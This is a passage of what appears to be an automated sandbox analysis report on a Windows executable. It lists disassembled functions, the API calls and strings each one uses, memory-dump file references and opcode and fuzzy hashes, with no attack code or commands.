                                                                                      • Opcode Fuzzy Hash: 51891a78ecb0cb02b79adb6620eef88c612eb2ace31b2632702bfee39aea86b7
                                                                                      • Instruction Fuzzy Hash: FBF0F9B0512B569B9F427F6CFC028083B64FB05720346065BF444D6369C7394801DFB2
                                                                                      Function 00D9CBE8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d0F
                                                                                      • API String ID: 0-1238022483
                                                                                      • Opcode ID: 914cb0bc2ea92aff4bdc82c19815b42266315e0d56944871a512b1ccf5e3d680
                                                                                      • Instruction ID: 2b55891c712aa9185dbd2edeb0d775625bc25d21017128df40aef8b19bf5ef42
                                                                                      • Opcode Fuzzy Hash: 914cb0bc2ea92aff4bdc82c19815b42266315e0d56944871a512b1ccf5e3d680
                                                                                      • Instruction Fuzzy Hash: E2519171D2020AABDF21AFA8D845FEE7FB8EF0A314F141169F405A7292D7359A41CB71
                                                                                      Function 00D94BDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000104), ref: 00D94C1A
                                                                                      • _free.LIBCMT ref: 00D94CE5
                                                                                      • _free.LIBCMT ref: 00D94CEF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                      • API String ID: 2506810119-1612741795
                                                                                      • Opcode ID: 67349c8116ae6f30a74ba86a8df2005f1ba4d174c54c83becff045a0490c081b
                                                                                      • Instruction ID: 34416c0ed51f2bfd5d2a2195f7775fbd43ac3fee2d59f9df7b20035020b63cb4
                                                                                      • Opcode Fuzzy Hash: 67349c8116ae6f30a74ba86a8df2005f1ba4d174c54c83becff045a0490c081b
                                                                                      • Instruction Fuzzy Hash: D3318D71A02259AFDF21DF999D81D9EBBFCEF89720F144066F80497212D7718A42CBB0
                                                                                      Function 00D9C9D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,00D9CD2F,00000000,00000000,00000000), ref: 00D9CA83
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00D9CD2F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8), ref: 00D9CAB1
                                                                                      • GetLastError.KERNEL32(?,00D9CD2F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8,00000010,00D9B747,00000000,00DA8150,00000010), ref: 00D9CAE2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                      • String ID: d0F
                                                                                      • API String ID: 2456169464-1238022483
                                                                                      • Opcode ID: b31d39b2ce3b0272f8d6faa01d5ad5cf924149c3bce23e429c6c1bf5fd1d4426
                                                                                      • Instruction ID: 122c25e8c3e264aa3e04796a5b934ddeb9ebd8391ac22b47864d94ee1afdb37e
                                                                                      • Opcode Fuzzy Hash: b31d39b2ce3b0272f8d6faa01d5ad5cf924149c3bce23e429c6c1bf5fd1d4426
                                                                                      • Instruction Fuzzy Hash: 03313D75A102199FDB14CF5DDC91AEAB7B9EB18305F1444ADE90AD7250D630AD80CB74
                                                                                      Function 00D77463 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D77468
                                                                                        • Part of subcall function 00D73AA3: __EH_prolog.LIBCMT ref: 00D73AA8
                                                                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 00D7752E
                                                                                        • Part of subcall function 00D77A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D77AAC
                                                                                        • Part of subcall function 00D77A9D: GetLastError.KERNEL32 ref: 00D77AF2
                                                                                        • Part of subcall function 00D77A9D: CloseHandle.KERNEL32(?), ref: 00D77B01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                      • API String ID: 3813983858-639343689
                                                                                      • Opcode ID: 61d24e7f1ba2e270df06b8337474c8d4374bbb8e319f2750a2b036327d972a21
                                                                                      • Instruction ID: ae8b30935cb5f1137278de0486247a3b40f19c1ece5309e2d856d5490394c8bf
                                                                                      • Opcode Fuzzy Hash: 61d24e7f1ba2e270df06b8337474c8d4374bbb8e319f2750a2b036327d972a21
                                                                                      • Instruction Fuzzy Hash: 6F317C71904208AEDF20EF68DC46BEE7B78EF45714F048429F84DE7292E7718A448B71
                                                                                      Function 00D8A8D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperW.USER32(?,?,?,?,00001000), ref: 00D8A92C
                                                                                      • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00D8A953
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharUpper
                                                                                      • String ID: -
                                                                                      • API String ID: 9403516-2547889144
                                                                                      • Opcode ID: 188ac2dfe6f2bd1bd7fb6d116333cb1d6b48eaec04dbb858b117f718773906be
                                                                                      • Instruction ID: 98492747486e7753ae481c6739115052ee4af3371bbfa6a6c3f89ea3a6055c1a
                                                                                      • Opcode Fuzzy Hash: 188ac2dfe6f2bd1bd7fb6d116333cb1d6b48eaec04dbb858b117f718773906be
                                                                                      • Instruction Fuzzy Hash: 8721E77240C34699F321FB2C8808B7BB798EB45364F8A841BF4C8C6941E674D898DB73
                                                                                      Function 00D89123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D891AB
                                                                                      • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 00D891C0
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D891D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: ASKNEXTVOL
                                                                                      • API String ID: 445417207-3402441367
                                                                                      • Opcode ID: e4462639d8e309bf9ef3c73d56234697502bc60bde3317e66733f9ab90557322
                                                                                      • Instruction ID: e07fbdc8c7738b3ce283fa24b70ecfc14a1556acfb6f6ace7a64ee930a72d618
                                                                                      • Opcode Fuzzy Hash: e4462639d8e309bf9ef3c73d56234697502bc60bde3317e66733f9ab90557322
                                                                                      • Instruction Fuzzy Hash: 8911D332249307BFD611AFA8DD5EF76BBA9EB4A705F084110F281DB1A4C7619C01DB36
                                                                                      Function 00D89646 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D89694
                                                                                      • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 00D896AC
                                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D896DA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: GETPASSWORD1
                                                                                      • API String ID: 445417207-3292211884
                                                                                      • Opcode ID: 3c8cad495726f7ccde9d6d72ca2791634e155df9caf658ed71c829188e9d8b79
                                                                                      • Instruction ID: 5cdb1ba89fc0e7cc75d758f2a321248ebc4aa03b3021298982d253395fdd257c
                                                                                      • Opcode Fuzzy Hash: 3c8cad495726f7ccde9d6d72ca2791634e155df9caf658ed71c829188e9d8b79
                                                                                      • Instruction Fuzzy Hash: 4611083250021977DB21AE789D5AFFAB76CEF0A740F180110FA89F3580E2A5DD04D7B1
                                                                                      Function 00D7B100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _swprintf.LIBCMT ref: 00D7B127
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • _wcschr.LIBVCRUNTIME ref: 00D7B145
                                                                                      • _wcschr.LIBVCRUNTIME ref: 00D7B155
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                      • String ID: %c:\
                                                                                      • API String ID: 525462905-3142399695
                                                                                      • Opcode ID: 259fb21e6715b8980a1093453a13688a0eb44b65ee8fcdb0499914752259d44c
                                                                                      • Instruction ID: 1a200a5249ad3a50b1eb4eb2a8b0266c96ec51b3309318b9b707f7082e6882fa
                                                                                      • Opcode Fuzzy Hash: 259fb21e6715b8980a1093453a13688a0eb44b65ee8fcdb0499914752259d44c
                                                                                      • Instruction Fuzzy Hash: 3501925750472179DB20AB659C86E6BB7ACEE963B0B94841BFC8CD6081FB20D850C2B1
                                                                                      Function 00D7F930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(000001A0,00DB1E74,00000000,?,?,00D7FB88,00000020,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?), ref: 00D7F969
                                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F973
                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F983
                                                                                      Strings
                                                                                      • Thread pool initialization failed., xrefs: 00D7F99B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                      • String ID: Thread pool initialization failed.
                                                                                      • API String ID: 3340455307-2182114853
                                                                                      • Opcode ID: b3b6310595d601da2418f4849ea3dfef6e57b678849b6705a3156128fa522365
                                                                                      • Instruction ID: 7abc40b41045750a779e47b8351e460f06d9ff584b494538819c3f69ed6a480a
                                                                                      • Opcode Fuzzy Hash: b3b6310595d601da2418f4849ea3dfef6e57b678849b6705a3156128fa522365
                                                                                      • Instruction Fuzzy Hash: 96112EB1600705AFD3305F659885AABFBECEB56355F14882EE2DEC3240EB716840CB70
                                                                                      Function 00D8BEE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                      • API String ID: 0-56093855
                                                                                      • Opcode ID: 82865eb3c93942cda9bab49339d65e980b7c8830f4bea4fb2ecdbab31bcf53ac
                                                                                      • Instruction ID: b0a23fd19effccfb2dc1957795d0d96e25019c6e65ad39c678becbc149fb6624
                                                                                      • Opcode Fuzzy Hash: 82865eb3c93942cda9bab49339d65e980b7c8830f4bea4fb2ecdbab31bcf53ac
                                                                                      • Instruction Fuzzy Hash: 8D015E76609306EFC701AB58EC40E36BBE9EB4A7A4F040627E691D2330D3329805EF71
                                                                                      Function 00D7CE48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D7CE57
                                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00D7CE66
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindHandleModuleResource
                                                                                      • String ID: LTR$RTL
                                                                                      • API String ID: 3537982541-719208805
                                                                                      • Opcode ID: 0d6b3e30a8b53c7f0effa7625f66a7bccbe54f35494056132ae470e445a138e0
                                                                                      • Instruction ID: 4144e7d181f5397f7b0def25fedb555a04ddedee84eebe20c74d41183dec7a14
                                                                                      • Opcode Fuzzy Hash: 0d6b3e30a8b53c7f0effa7625f66a7bccbe54f35494056132ae470e445a138e0
                                                                                      • Instruction Fuzzy Hash: 79F02B316143146BE72456755C0AF6B3BACE786710F04825DF649C61C0EBA5990887F5
                                                                                      Function 00D96552 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: __alldvrm$_strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 1036877536-0
                                                                                      • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                      • Instruction ID: ed7049e60c3188789c704e7a924993d60268f56fdfc6b1f386d06ad79f0a1e68
                                                                                      • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                      • Instruction Fuzzy Hash: C3A148719003869FEF21DFA8C891BAEBBE5EF15354F2841ADE4959B281D238DD41C770
                                                                                      Function 00D79F2A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D77F55,?,?,?), ref: 00D79FD0
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D77F55,?,?), ref: 00D7A014
                                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D77F55,?,?,?,?,?,?,?,?), ref: 00D7A095
                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,00D77F55,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7A09C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                      • String ID:
                                                                                      • API String ID: 2287278272-0
